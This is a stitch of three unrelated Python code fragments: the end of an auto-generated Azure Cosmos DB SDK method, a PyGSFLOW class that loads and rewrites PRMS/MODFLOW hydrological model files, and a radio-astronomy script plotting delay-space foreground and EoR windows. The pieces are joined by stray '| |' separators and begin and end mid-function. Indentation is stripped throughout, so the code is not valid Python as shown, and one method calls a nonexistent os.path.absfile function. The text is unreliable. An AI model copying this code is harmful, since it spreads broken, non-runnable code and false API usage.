header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ThroughputSettingsGetResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_mongo_db_collection_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}/throughputSettings/default'} # | |
<gh_stars>0
# -*- coding: utf-8 -*-
import os, sys
import logging
from .control import Control
from .prms import Prms
from .supports import _get_file_abs
from .prms_help import Helper
import flopy
import subprocess as sp
if sys.version_info > (3, 0):
import queue as Queue
else:
import Queue
from datetime import datetime
import threading
def load(control_file):
gs = Gsflow(control_file=control_file)
gs.load()
return gs
class Gsflow():
def __init__(self, control_file=None, prms=None, mf=None, mf_load_only=None,
prms_load_only=None, gsflow_exe=None):
print ("PyGSFLOW ------ V0.0")
self.Help = Helper()
self.control_file = os.path.abspath(control_file)
self.ws = None
self.mf_load_only = mf_load_only
self.prms_load_only = prms_load_only
if gsflow_exe == None:
self.gsflow_exe = os.path.join(os.path.dirname(__file__), r"bin\gsflow.exe")
# initialize prms
if prms and isinstance(prms, Prms):
self.prms = prms
else:
self.prms = None
# todo: generate an msg
# inialize flopy
if mf and isinstance(mf, flopy.modflow.Modflow):
self.mf = mf
else:
self.mf = None
# todo: generate an error
self.load()
def load(self):
# load control file
if not (os.path.isfile(self.control_file)):
raise ValueError("Cannot find control file")
self.control = Control(control_file=self.control_file)
print("Control file is loaded")
# load prms
print("Working on loading PRMS model ...")
self.prms = Prms(control=self.control)
# load modflow
mode = self.control.get_values('model_mode')
if 'GSFLOW' in mode[0] or 'MODFLOW' in mode[0]:
print ("Working on loading MODFLOW files ....")
fname = self.control.get_values('modflow_name')
fname = _get_file_abs(control_file=self.control_file, fn=fname[0])
self._load_modflow(fname)
self.mf.namefile = os.path.basename(self.control.get_values('modflow_name')[0])
else:
print ("There are no Modflow files, PRMS model only")
def _load_modflow(self, fname):
"""
The package files in the .nam file are relative to the execuatble gsflow. So here, we generate a temp.nam
file that that has the absollute files
:return:
"""
fidr = open(fname, 'r')
content = fidr.readlines()
fidr.close()
temp_fn = os.path.basename(fname).split('.')[0] + "_gsflow_temp_.nam"
mf_dir = os.path.dirname(fname)
temp_fn = os.path.join(mf_dir, temp_fn)
fidw = open(temp_fn, 'w')
for line in content:
line = line.strip()
if line[0] == '#':
continue
parts = line.split()
pkg_nm = parts[0]
pkg_un = parts[1]
pkg_fn = parts[2]
pkg_fn = os.path.basename(pkg_fn)
# pkg_fn = os.path.join(mf_dir,pkg_fn)
txt = "{} {} {}\n".format(pkg_nm, pkg_un, pkg_fn)
fidw.write(txt)
fidw.close()
bas_nam = os.path.basename(temp_fn)
self.mf = flopy.modflow.Modflow.load(temp_fn, model_ws=mf_dir)
print ("MOSFLOW files are loaded ... ")
# def change_ws(self, ws):
#
# if os.path.isdir(ws):
# print("Warning: The {} directory already exists".format(ws))
# parent_folder = os.path.dirname(ws)
#
# if not (os.path.isdir(parent_folder)):
# raise ValueError(" The parent directory {} doesn't exist...".format(parent_folder))
#
# if not (os.path.isdir(ws)):
# os.mkdir(ws)
#
# self.ws = ws
#
# # change control file location
# fnn = os.path.basename(self.control.control_file)
# self.control.control_file = os.path.join(self.ws, fnn)
#
# # change parameters
# for par_record in self.prms.Parameters.parameters_list:
# curr_file = os.path.basename(par_record.file_name)
# curr_file = os.path.join(self.ws, curr_file)
# par_record.file_name = curr_file
#
# # change datafile
# curr_file = os.path.basename(self.prms.Data.data_file)
# curr_file = os.path.join(self.ws, curr_file)
# self.prms.Data.data_file = curr_file
#
# # change mf
# if not (self.mf == None):
# self.mf.change_model_ws(self.ws)
# def change_base_file_name(self, filename):
# # change control file location
# cnt_file = filename + "_cnt" + ".control"
# dir__ = os.path.dirname(self.control.control_file)
# self.control.control_file = os.path.join(dir__, cnt_file)
#
# # change parameters
# for index, par_record in enumerate(self.prms.Parameters.parameters_list):
# curr_file = os.path.basename(par_record.file_name)
# curr_file = os.path.join(self.ws, curr_file)
# par_record.file_name = curr_file
#
# # change datafile
# curr_file = os.path.basename(self.prms.Data.data_file)
# curr_file = os.path.join(self.ws, curr_file)
# self.prms.Data.data_file = curr_file
# pass
def _get_relative_path(self, fn):
"""
If relative files are used, they should be relative to the control file
:return: relative path with respect to control file
"""
control_file_abs = os.path.absfile(self.control)
fn_abs = os.path.absfile(fn)
# find common path
rel_dir = os.path.relpath(os.path.dirname(fn), os.path.dirname(control_file_abs))
rel_path = os.path.join(rel_dir + os.path.basename(fn))
return rel_path
# def _mk_dir(self, dir_):
# if not (os.path.isdir(dir_)):
# os.mkdir(dir_)
# else:
# print(" Warning: the directory exists {}".format(dir_))
def write_input(self, basename=None, workspace=None):
"""
:param basename:
:param workspace:
:return:
Write input files for gsflow. Four cases are possible:
(1) if basename and workspace are None,then the exisiting files will be overwritten
(2) if basename is specified, only file names will be changes
(3) if only workspace is specified, only folder will be changed
(4) when both basename and workspace are specifed both files are changed
"""
# overwrite
print("Writing the project files .....")
if not (workspace == None):
workspace = os.path.abspath(workspace)
if basename == None and workspace == None:
print("Warning: input files will be overwritten....")
self._write_all()
return
# only change the directory
if (basename == None) and (not (workspace == None)):
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
fnn = os.path.basename(self.control.control_file)
self.control.control_file = os.path.join(workspace, fnn)
self.control_file = os.path.join(workspace, fnn)
self.prms.control_file = self.control_file
# change parameters
new_param_file_list = []
for par_record in self.prms.parameters.parameters_list:
curr_file = os.path.basename(par_record.file_name)
curr_file = os.path.join(workspace, curr_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
curr_file = os.path.basename(self.prms.Data.data_file[0])
curr_file = os.path.join(workspace, curr_file)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
self.mf.change_model_ws(workspace)
nmfile = os.path.basename(self.mf.name)
self.mf.name = os.path.join(self.mf.model_ws, nmfile)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = nmfile + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = self.mf.name + ".nam"
self.control.set_values('modflow_name', [mfnm])
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
cnt_dir = os.path.dirname(self.control_file)
va = os.path.join(workspace, os.path.basename(fil))
file_value.append(va)
self.control.set_values(rec_name, file_value)
# write
self.prms.control = self.control
self._write_all()
return
# only change the basename
if (not (basename == None)) and (workspace == None):
cnt_file = basename + "_cont.control"
ws_ = os.path.dirname(self.control.control_file)
self.control.control_file = os.path.join(ws_, cnt_file)
self.control_file = os.path.join(ws_, cnt_file)
self.prms.control_file = self.control_file
# change parameters
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(self.prms.parameters.parameters_list):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_dir = os.path.dirname(par_record.file_name)
curr_file = os.path.join(curr_dir, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_dir = os.path.dirname(self.prms.Data.data_file)
curr_file = os.path.join(curr_dir, dfile)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
curr_dir = self.mf.model_ws
#self.mf.name = os.path.join(curr_dir, basename)
self.mf.name = os.path.join(curr_dir, basename)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = basename + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = self.mf.name + ".nam"
self.control.set_values('modflow_name',[mfnm])
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
if rec_name in ['modflow_name', 'param_file', 'data_file']:
continue
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
dir_name = os.path.dirname(fil)
if rec_name == 'modflow_name':
mfname = basename + ".nam"
filvalue = os.path.join(dir_name, mfname)
else:
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
#ext = fil.split(".")[-1]
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(dir_name, vvfile)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
self.prms.control = self.control
self._write_all()
return
# change both directory & basename
if (not (basename == None)) and (not (workspace == None)):
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
cnt_file = basename + "_cont.control"
self.control.control_file = os.path.join(workspace, cnt_file)
self.prms.control_file = self.control.control_file
self.control_file = self.control.control_file
# change parameters
## get param files list
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(self.prms.parameters.parameters_list):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_file = os.path.join(workspace, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values('param_file', new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.join(workspace, dfile)
self.prms.Data.data_file = curr_file
self.control.set_values('data_file', [curr_file])
# change mf
if not (self.mf == None):
self.mf.change_model_ws(workspace)
self.mf.name = os.path.join(workspace, basename)
out_files_list = []
for out_file in self.mf.output_fnames:
ext = out_file.split(".")[-1]
if out_file.count('.') > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
#new_outfn = os.path.join(workspace, basename + "." + ext)
new_outfn = basename + "." + ext
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
mfnm = basename + ".nam"
self.control.set_values('modflow_name', [os.path.join(workspace, mfnm)])
## TODO: Update control file
# update file names in control object
for rec_name in self.control._gslow_files:
if rec_name in self.control._record_names:
if rec_name in ['modflow_name', 'param_file', 'data_file']:
continue
file_values = self.control.get_values(rec_name)
file_value = []
| |
fontsize=12)
cbax.xaxis.set_label_position('top')
# PLT.tight_layout()
fig.subplots_adjust(right=0.72)
fig.subplots_adjust(top=0.88)
PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/'+telescope_str+'multi_baseline_screening_CLEAN_noiseless_PS_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_asm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6,nchan*freq_resolution/1e6)+bpass_shape+'{0:.1f}'.format(oversampling_factor)+'.png', bbox_inches=0)
PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/'+telescope_str+'multi_baseline_screening_CLEAN_noiseless_PS_'+ground_plane_str+snapshot_type_str+obs_mode+'_gaussian_FG_model_asm'+sky_sector_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6,nchan*freq_resolution/1e6)+bpass_shape+'{0:.1f}'.format(oversampling_factor)+'.eps', bbox_inches=0)
##################################################################
if plot_15:
# 15) Plot Fourier space
bw = nchan * freq_resolution
fig = PLT.figure(figsize=(6,6))
ax = fig.add_subplot(111)
# ax.plot(truncated_ref_bl_length, 1e6*min_delay.ravel(), 'k-', truncated_ref_bl_length, 1e6*max_delay.ravel(), 'k-')
# ax.plot(truncated_ref_bl_length, 1e6*(min_delay.ravel()-1/bw), 'k--', truncated_ref_bl_length, 1e6*(max_delay.ravel()+1/bw), 'k--')
ph_line, nh_line = ax.plot(truncated_ref_bl_length, 1e6*truncated_ref_bl_length/FCNST.c, 'k-', truncated_ref_bl_length, -1e6*truncated_ref_bl_length/FCNST.c, 'k-')
ax.plot(truncated_ref_bl_length, -1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), 'k--', truncated_ref_bl_length, 1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), 'k--')
ax.plot(truncated_ref_bl_length[truncated_ref_bl_length <= FCNST.c/coarse_channel_resolution], 1e6/coarse_channel_resolution*NP.ones(NP.sum(truncated_ref_bl_length <= FCNST.c/coarse_channel_resolution)), 'k-.')
ax.plot(truncated_ref_bl_length[truncated_ref_bl_length <= FCNST.c/coarse_channel_resolution], -1e6/coarse_channel_resolution*NP.ones(NP.sum(truncated_ref_bl_length <= FCNST.c/coarse_channel_resolution)), 'k-.')
ax.fill_between(truncated_ref_bl_length, -0.5/freq_resolution*1e6, -1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), facecolor='0.8', edgecolor='none')
ax.fill_between(truncated_ref_bl_length, 1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), 0.5/freq_resolution*1e6, facecolor='0.8', edgecolor='none')
ax.fill_between(truncated_ref_bl_length, -1e6/coarse_channel_resolution, -1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), facecolor='0.7', edgecolor='none')
ax.fill_between(truncated_ref_bl_length, 1e6*(truncated_ref_bl_length/FCNST.c + 1/bw), 1e6/coarse_channel_resolution, facecolor='0.7', edgecolor='none')
ax.fill_between(truncated_ref_bl_length, -1e6*truncated_ref_bl_length/FCNST.c, 1e6*truncated_ref_bl_length/FCNST.c, facecolor='0.5', edgecolor='none')
ax.set_xlim(truncated_ref_bl_length.min(), truncated_ref_bl_length.max())
ax.set_ylim(-1.25, 1.25)
ax.text(0.5, 0.5, 'Foregrounds', transform=ax.transAxes, fontsize=12, weight='semibold', ha='left', color='black')
ax.text(100, 1e6/coarse_channel_resolution, 'Delay grating', fontsize=12, weight='semibold', ha='left', color='black', va='bottom')
ax.text(100, -1e6/coarse_channel_resolution, 'Delay grating', fontsize=12, weight='semibold', ha='left', color='black', va='top')
ax.text(10, 0.45, 'Maximal EoR \nsensitivity', fontsize=12, weight='semibold', ha='left', va='center')
ax.text(10, -0.45, 'Maximal EoR \nsensitivity', fontsize=12, weight='semibold', ha='left', va='center')
anchor_bll = 125.0
anchor_nh_delay = -1e6 * anchor_bll/FCNST.c
anchor_ph_delay = 1e6 * anchor_bll/FCNST.c
nhp1 = ax.transData.transform_point(NP.array([nh_line.get_xdata()[0], nh_line.get_ydata()[0]]))
nhp2 = ax.transData.transform_point(NP.array([nh_line.get_xdata()[-1], nh_line.get_ydata()[-1]]))
nh_angle = NP.degrees(NP.arctan2(nhp2[1]-nhp1[1], nhp2[0]-nhp1[0]))
php1 = ax.transData.transform_point(NP.array([ph_line.get_xdata()[0], ph_line.get_ydata()[0]]))
php2 = ax.transData.transform_point(NP.array([ph_line.get_xdata()[-1], ph_line.get_ydata()[-1]]))
ph_angle = NP.degrees(NP.arctan2(php2[1]-php1[1], php2[0]-php1[0]))
nh_text = ax.text(anchor_bll, anchor_nh_delay, 'Horizon', fontsize=12, weight='semibold', rotation=nh_angle, ha='left')
ph_text = ax.text(anchor_bll, anchor_ph_delay, 'Horizon', fontsize=12, weight='semibold', rotation=ph_angle, ha='left')
# ax.set_ylim(-0.5/freq_resolution*1e6, 0.5/freq_resolution*1e6)
ax.set_ylabel(r'$\tau$ [$\mu$s]', fontsize=16, weight='medium')
ax.set_xlabel(r'$|\mathbf{b}|$ [m]', fontsize=16, weight='medium')
axr = ax.twinx()
axr.set_yticks([])
axr.set_yticks(kprll(ax.get_yticks()*1e-6, redshift))
axr.set_ylim(kprll(NP.asarray(ax.get_ylim())*1e-6, redshift))
axr.set_ylabel(r'$k_\parallel$ [$h$ Mpc$^{-1}$]', fontsize=16, weight='medium')
yformatter = FuncFormatter(lambda y, pos: '{0:.2f}'.format(y))
axr.yaxis.set_major_formatter(yformatter)
axt = ax.twiny()
axt.set_xticks([])
axt.set_xticks(kperp(ax.get_xticks()*freq/FCNST.c, redshift))
axt.set_xlim(kperp(NP.asarray(ax.get_xlim())*freq/FCNST.c, redshift))
axt.set_xlabel(r'$k_\perp$ [$h$ Mpc$^{-1}$]', fontsize=16, weight='medium')
xformatter = FuncFormatter(lambda x, pos: '{0:.3f}'.format(x))
axt.xaxis.set_major_formatter(xformatter)
PLT.tight_layout()
PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/fourier_space_{0:.1f}_MHz_{1:.1f}_MHz.png'.format(freq/1e6,nchan*freq_resolution/1e6))
PLT.savefig('/data3/t_nithyanandan/'+project_dir+'/figures/fourier_space_{0:.1f}_MHz_{1:.1f}_MHz.eps'.format(freq/1e6,nchan*freq_resolution/1e6))
##################################################################
if plot_17 or plot_18 or plot_19:
delta_array_usm_infile = '/data3/t_nithyanandan/'+project_dir+'/delta_array_multi_baseline_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_usm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb'
delta_array_usm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/delta_array_multi_baseline_CLEAN_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_usm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
delta_array_asm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/delta_array_multi_baseline_CLEAN_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_asm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
mwa_dipole_asm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/mwa_dipole_multi_baseline_CLEAN_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_asm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
hera_asm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/hera_multi_baseline_CLEAN_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_asm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
delta_usm_CLEAN_infile = '/data3/t_nithyanandan/'+project_dir+'/delta_multi_baseline_CLEAN_visibilities_no_ground_'+snapshot_type_str+obs_mode+'_baseline_range_{0:.1f}-{1:.1f}_'.format(ref_bl_length[baseline_bin_indices[0]],ref_bl_length[min(baseline_bin_indices[n_bl_chunks-1]+baseline_chunk_size-1,total_baselines-1)])+'gaussian_FG_model_usm'+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+'Tsys_{0:.1f}K_{1:.1f}_MHz_{2:.1f}_MHz_'.format(Tsys, freq/1e6, nchan*freq_resolution/1e6)+'no_pfb_'+bpass_shape
ia = RI.InterferometerArray(None, None, None, init_file=delta_array_usm_infile+'.fits')
simdata_bl_orientation = NP.angle(ia.baselines[:,0] + 1j * ia.baselines[:,1], deg=True)
simdata_neg_bl_orientation_ind = simdata_bl_orientation > 90.0 + 0.5*180.0/n_bins_baseline_orientation
simdata_bl_orientation[simdata_neg_bl_orientation_ind] -= 180.0
ia.baselines[simdata_neg_bl_orientation_ind,:] = -ia.baselines[simdata_neg_bl_orientation_ind,:]
hdulist = fits.open(delta_array_usm_infile+'.fits')
latitude = hdulist[0].header['latitude']
pointing_coords = hdulist[0].header['pointing_coords']
pointings_table = hdulist['POINTING AND PHASE CENTER INFO'].data
lst = pointings_table['LST']
n_snaps = lst.size
hdulist.close()
if pointing_coords == 'altaz':
pointings_altaz = NP.hstack((pointings_table['pointing_latitude'].reshape(-1,1), pointings_table['pointing_longitude'].reshape(-1,1)))
pointings_hadec = GEOM.altaz2hadec(pointings_altaz, latitude, units='degrees')
pointings_dircos = GEOM.altaz2dircos(pointings_altaz, units='degrees')
elif pointing_coords == 'radec':
pointings_radec = NP.hstack((pointings_table['pointing_longitude'].reshape(-1,1), pointings_table['pointing_latitude'].reshape(-1,1)))
pointings_hadec = NP.hstack(((lst-pointings_radec[:,0]).reshape(-1,1), pointings_radec[:,1].reshape(-1,1)))
pointings_altaz = GEOM.hadec2altaz(pointings_hadec, latitude, units='degrees')
pointings_dircos = GEOM.altaz2dircos(pointings_altaz, units='degrees')
elif pointing_coords == 'hadec':
pointings_hadec = NP.hstack((pointings_table['pointing_longitude'].reshape(-1,1), pointings_table['pointing_latitude'].reshape(-1,1)))
pointings_radec = NP.hstack(((lst-pointings_hadec[:,0]).reshape(-1,1), pointings_hadec[:,1].reshape(-1,1)))
pointings_altaz = GEOM.hadec2altaz(pointings_hadec, latitude, units='degrees')
pointings_dircos = GEOM.altaz2dircos(pointings_altaz, units='degrees')
hdulist = fits.open(delta_array_usm_CLEAN_infile+'.fits')
clean_lags = hdulist['SPECTRAL INFO'].data['lag']
clean_lags_orig = NP.copy(clean_lags)
delta_array_usm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
delta_array_usm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
delta_array_usm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
delta_array_usm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
hdulist.close()
hdulist = fits.open(delta_array_asm_CLEAN_infile+'.fits')
delta_array_asm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
delta_array_asm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
delta_array_asm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
delta_array_asm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
hdulist.close()
hdulist = fits.open(mwa_dipole_asm_CLEAN_infile+'.fits')
mwa_dipole_asm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
mwa_dipole_asm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
mwa_dipole_asm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
mwa_dipole_asm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
hdulist.close()
hdulist = fits.open(hera_asm_CLEAN_infile+'.fits')
hera_asm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
hera_asm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
hera_asm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
hera_asm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
hdulist.close()
hdulist = fits.open(delta_usm_CLEAN_infile+'.fits')
delta_usm_cc_skyvis = hdulist['CLEAN NOISELESS VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES IMAG'].data
delta_usm_cc_skyvis_res = hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISELESS VISIBILITIES RESIDUALS IMAG'].data
delta_usm_cc_vis = hdulist['CLEAN NOISY VISIBILITIES REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES IMAG'].data
delta_usm_cc_vis_res = hdulist['CLEAN NOISY VISIBILITIES RESIDUALS REAL'].data + 1j * hdulist['CLEAN NOISY VISIBILITIES RESIDUALS IMAG'].data
hdulist.close()
clean_lags = DSP.downsampler(clean_lags, 1.0*clean_lags.size/ia.lags.size, axis=-1)
clean_lags = clean_lags.ravel()
delaymat = DLY.delay_envelope(ia.baselines[truncated_ref_bl_ind,:], pc, units='mks')
bw = nchan * freq_resolution
min_delay = -delaymat[0,:,1]-delaymat[0,:,0]
max_delay = delaymat[0,:,0]-delaymat[0,:,1]
clags = clean_lags.reshape(1,-1)
min_delay = min_delay.reshape(-1,1)
max_delay = max_delay.reshape(-1,1)
thermal_noise_window = NP.abs(clags) >= max_abs_delay*1e-6
thermal_noise_window = NP.repeat(thermal_noise_window, ia.baselines[truncated_ref_bl_ind,:].shape[0], axis=0)
EoR_window = NP.logical_or(clags > max_delay+3/bw, clags < min_delay-3/bw)
strict_EoR_window = NP.logical_and(EoR_window, NP.abs(clags) < 1/coarse_channel_resolution)
wedge_window = NP.logical_and(clags <= max_delay, clags >= min_delay)
non_wedge_window = NP.logical_not(wedge_window)
small_delays_EoR_window = EoR_window.T
small_delays_strict_EoR_window = strict_EoR_window.T
small_delays_wedge_window = wedge_window.T
if max_abs_delay is not None:
small_delays_ind = NP.abs(clean_lags) <= max_abs_delay * 1e-6
clean_lags = clean_lags[small_delays_ind]
small_delays_EoR_window = small_delays_EoR_window[small_delays_ind,:]
small_delays_strict_EoR_window = small_delays_strict_EoR_window[small_delays_ind,:]
small_delays_wedge_window = small_delays_wedge_window[small_delays_ind,:]
if plot_17:
# 17) Plot delay spectra of the MWA tile power pattern using a uniform sky model
delta_array_usm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:] = delta_array_usm_cc_skyvis[simdata_neg_bl_orientation_ind,:,:].conj()
delta_array_usm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:] = delta_array_usm_cc_skyvis_res[simdata_neg_bl_orientation_ind,:,:].conj()
delta_array_usm_cc_skyvis_lag = NP.fft.fftshift(NP.fft.ifft(delta_array_usm_cc_skyvis, axis=1),axes=1) * delta_array_usm_cc_skyvis.shape[1] * freq_resolution
delta_array_usm_ccres_sky = NP.fft.fftshift(NP.fft.ifft(delta_array_usm_cc_skyvis_res, axis=1),axes=1) * delta_array_usm_cc_skyvis.shape[1] * freq_resolution
delta_array_usm_cc_skyvis_lag = delta_array_usm_cc_skyvis_lag + delta_array_usm_ccres_sky
